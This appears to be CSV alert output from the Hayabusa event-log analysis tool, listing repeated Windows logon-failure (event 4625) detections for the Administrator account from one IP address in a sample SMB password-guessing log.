+2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3YM3zaZk64qqq7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mOLbk23zOqQLZYZU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0tlyXqvCQJVqaB5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: npjQlHcGls5gENng | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7buinUqketmW3Ib6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Rs5gYGs6JBf2yV1J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67hYMvtmbrmv5LHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtV42zBnWwRCLfJS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jnaPNm28FvbFfM8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCEvKO14gPFHAZIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iJJyXCm1YOI2uIAS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MNAScx4qMKxCJQdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKTHsNA29ZnPHCHQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CjvAb3sjN0PM8my4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wYQ6HuRSMh8DXzMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZgejUxgojDE1kR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2L4yO411OUnkRGWQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O3mGCNGFML75P7w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6CBslPz31UACz0wR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4Y8V0wB6unpmFXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXSbx81GD6dYgHtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWbnppJfJ0Ll9oLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: eoUjizV5iXImPGTe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHNG9oylnT46IObg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LUeAisNPQULjD2t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2sB5MlRw4Ox1OWdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WaklWtKd8QByH8M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nzvyy6CUk43SVxZW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xeolvnD92qP1dJPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDvRwPbu6yQH2pEf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxKdofXKKkCLn2n6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkO9p50Q9iFolbmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p01SZCA784xmPMe2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XKaI3FHBbBXvVsES | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmUk6sW8QreDIZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0w9SSWaaTX7chM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 46vgsyX5Wxn2rupf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PV8628a8GNKoFyzM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mksBFEFzkC08dB4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: U6QlHT6Bp63JDehd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRj4fxcRY0Esegl6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dj6zQjZwGEBo0zNt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imfY1T2VMoaqDSUd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvPP8UYn9fLpRYl4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFTGQ5tzNI5k58cK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8Zj3g1WiTLx8OlJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x2Lr6j8Qt4xEmZZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BeDRsguCovO47lKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KqrDyaFTewMPSzD9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nBVMAki1Ghpknf6p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXKhNUmBUQBTyeNM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1g9TVwsweaBfZgE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kWymb6ucohaBB60b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjL0zwlZofVuWhGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxsdzkJdnaZs5eKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PR6EpKvbqMeoQlKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: OZ3LMTtsVNI1gRO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75bNeXwYSZPhJdJ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lH6TVXSqJb1qLd3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edDWye6c2UhKznR6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxKUl1lynGY1ectn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vI5yUgukPBVRorJI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmR29QcBKMGVQ8rB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7luV5GfiT0v0h7D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yA7pIDFgQbLIInqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 84g2gO0253Ut4O1O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DRkFX9WTAhBZ8jc8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuoQAi4k3XZPaf4O | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KjKMhCnbR0uFT0av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lfwqPB0AgTfIOt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mJuG26pQzdjUQael | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXwEziYTA3DkkFVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CHr6dirvkT8B9ZVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: B5eSMLiF4BsfY3xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
